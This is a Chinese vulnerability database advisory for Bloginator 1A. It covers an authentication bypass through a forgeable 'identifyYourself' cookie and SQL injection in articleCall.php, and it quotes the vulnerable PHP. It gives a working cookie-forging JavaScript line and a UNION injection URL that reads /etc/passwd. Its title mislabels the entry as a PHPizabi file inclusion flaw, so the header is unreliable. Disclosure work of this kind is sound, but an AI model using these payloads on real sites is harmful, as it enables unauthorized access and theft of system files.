PHPizabi modules/chat/dac.php模块本地文件包含漏洞


添加时间:
2009-03-27

系统编号:
WAVDB-01366
BugCVE: CVE-2009-1050 CVE-2009-1049
BUGTRAQ: 34187

影响版本:
Bloginator 1A

程序介绍:

Bloginator是一套PHP脚本,允许用户在网站上显示、添加、编辑和删除文章。

漏洞分析:

Bloginator没有正确地验证认证cookie,远程攻击者可以通过修改identifyYourself cookie参数绕过安全限制获得非授权访问。以下是有漏洞的代码段:
 
[URL] www.site.com/bloginator/articleCall.php
 
global $name,$password,$returnLink;
$p_name = strip_tags(substr($_POST['name'],0,32));
$p_password = strip_tags(substr($_POST['password'],0,32));
if(crypt($p_name , $name) == $name and crypt($p_password,$password) == $password )
{
 
           setcookie("identifyYourself","you are identified");
           print "Login successfull<br>";
           print $returnLink;
       }
   else {print "Wrong username or password";
   }
}
 
Bloginator的articleCall.php模块没有正确的验证对id参数所传送的输入参数,远程攻击者可以通过提交恶意查询请求执行SQL注入攻击。以下是有漏洞的代码段: 
 
[URL] www.site.com/bloginator/articleCall.php
 
$action = @$_GET['action'];
[...]
$id = $_GET['id'];
[...]
function editArticle($id,$message)
{
global $returnLink;
$query = "select * FROM articles WHERE id='$id'";
$sql = mysql_query($query) or die(mysql_query());
$title = mysql_result($sql,0,'title');
$title = htmlentities($title);
$article = mysql_result($sql,0,'article');
$article = htmlentities($article);
$link = mysql_result($sql,0,'link');
$link = htmlentities($link);
 
startHTML("Edit ID # ".$id);
?>


漏洞利用:

 javascript:document.cookie = "identifyYourself=you+are+identified; path=/";
www.site.com/action=edit&id=fireshot' union select 1,2,3,4,load_file('/etc/passwd'),6,7 order by '*


解决方案:
厂商补丁:

kamAds.com
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://kamads.com/kamads_ads/bloginator.php

信息来源:
<*来源:FireShot (fireshot@autistici.org)

链接:http://secunia.com/advisories/34395/
http://milw0rm.com/exploits/8243
*>